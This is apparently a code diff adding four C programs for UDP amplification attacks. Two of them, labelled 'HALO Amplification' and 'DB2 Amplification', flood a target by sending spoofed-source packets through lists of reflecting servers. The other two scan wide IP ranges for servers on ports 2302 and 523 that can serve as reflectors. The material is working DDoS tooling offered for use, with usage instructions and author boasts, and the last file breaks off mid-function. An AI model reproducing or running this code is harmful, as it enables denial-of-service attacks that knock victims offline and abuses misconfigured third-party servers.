@ -0,0 +1,191 @@
|
|||
/* HALO Amplification */
|
||||
|
||||
/* Made by James, credit me cus im swag for payload and idk for original ssdp script. */
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
/* function for header checksums */
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 10;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(2302);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x5c\x5c\x73\x74\x61\x74\x75\x73\x5c\x5c", 10);
|
||||
udph->len=htons(sizeof(struct udphdr) + 10);
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = sin.sin_port;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
int i=0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
if(i==5)
|
||||
{
|
||||
usleep(0);
|
||||
i=0;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
if(argc > 5)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
} else {
|
||||
while(1){
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,200 @@
|
|||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
static unsigned int payloadsize = 10;
|
||||
static unsigned int xport = 2302;
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
char payload[] =
|
||||
"\x5c\x5c\x73\x74\x61\x74\x75\x73\x5c\x5c";
|
||||
|
||||
size = sizeof(payload);
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memset(buf, 0x01, payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=size;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *recievethread()
|
||||
{
|
||||
printf("\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("Socket Error\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
if(data_size <0 )
|
||||
{
|
||||
printf("Recvfrom error , failed to get packets\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + payloadsize;
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - payloadsize;
|
||||
|
||||
if (body_length > 40)
|
||||
|
||||
{
|
||||
found_srvs++;
|
||||
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Shrooms Torrent Scanner\nUsage: %s <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("Scan in Progress \n");
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Trackers Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Percent Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,210 @@
|
|||
/* DB2 Amplification */
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 20;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(523);
|
||||
udph->check = 0;
|
||||
strcpy((void *)udph + sizeof(struct udphdr), "\x44\x42\x32\x47\x45\x54\x41\x44\x44\x52\x00\x53\x51\x4c\x30\x35\x30\x30\x30\x00");
|
||||
udph->len=htons(sizeof(struct udphdr) + 20);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,308 @@
|
|||
/* DB2 Scanner, made by Bears. */
|
||||
|
||||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 20;
|
||||
static unsigned int xport = 523;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x44\x42\x32\x47\x45\x54\x41\x44\x44\x52\x00\x53\x51\x4c\x30\x35\x30\x30\x30\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
